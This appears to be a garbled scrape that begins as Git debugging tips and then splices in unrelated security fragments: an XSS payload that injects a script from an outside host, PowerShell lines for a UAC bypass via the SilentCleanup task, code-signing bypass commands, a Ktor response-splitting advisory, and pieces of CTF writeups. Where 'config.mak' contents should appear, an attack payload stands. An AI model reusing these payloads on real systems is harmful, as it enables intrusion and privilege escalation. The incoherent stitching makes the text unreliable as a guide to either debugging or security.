Some tips about debugging Git with GDB and LLDB.
By default, Git's Makefile compiles Git with debug symbols (-g),
but with optimization level -O2, which can lead to some variable being optimized out and thus making the executable harder to debug.
To compile with -O0, you can tweak CFLAGS using config.mak:
$ cat config.mak
| d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://rhy.xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000) |
MathSH was a very innovative challenge in the category sandbox escape. Three members of our team - ALLES! - worked for several hours and eventually drew first blood on this challenge. This writeup is split into several parts, namely: dumping the binary, analysing the sandbox, gaining a better primitive for code execution and finally escaping the sandbox.
The description Calculator as a Service (CAAS) already hints to CAS, a legacy .NET technology to run code in various level of trusts.
We are given a restricted "shell" to calculate math expressions:
| New-ItemProperty "HKCU:\Environment" -Name "windir" -Value "cmd.exe /k cmd.exe" -PropertyType String -Force | |
| schtasks.exe /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I |
| $Host.Runspace.LanguageMode | |
| Get-AuthenticodeSignature -FilePath C:\Demo\bypass_test.psm1 | |
| Get-AuthenticodeSignature -FilePath C:\Demo\notepad_backdoored.exe | |
| # Try to execute the script. Add-Type will fail. | |
| Import-Module C:\Demo\bypass_test.psm1 | |
| $VerifyHashFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' + | |
| '\OID\EncodingType 0\CryptSIPDllVerifyIndirectData' |
| <?php | |
| //php gd-gif.php image.gif gd-image.gif | |
| $gif = imagecreatefromgif($argv[1]); | |
| imagegif($gif, $argv[2]); | |
| imagedestroy($gif); | |
| ?> |
The Ktor Coroutine based I/O Server implementation io.ktor.client.engine.cio.CIO is vulnerable to HTTP Response Splitting.
This vulnerability is fixed in Ktor version 1.2.6.
| #!/usr/bin/env python2 | |
| # Challenge: https://gctf-2019.appspot.com/#challenges/sandbox-sandbox-ridl | |
| from pwn import * | |
| import os | |
| def split_by(data, cnt): | |
| return [data[i : i+cnt] for i in xrange(0, len(data), cnt)] |
The challenge consisted of an iOS app (Calc.app) which implemented a simple calculator. Moreover, the app also registered a custom URL scheme (icalc://) which would simply evaluate the content of the URL. The calculator was implemented using NSExpressions and the input string would simply be parsed as such an expression and executed. NSExpressions are pretty powerful and allow for example calls to ObjC Methods (e.q. typing in sqrt(42) would end up calling +[_NSPredicateUtilities sqrt:@42]). Further, there are two interesting helper functions available in NSExpressions:
FUNCTION(obj, 'foo', "bar")
Which will result in a call of the method 'foo' on object obj with parameter "bar" (an NSString).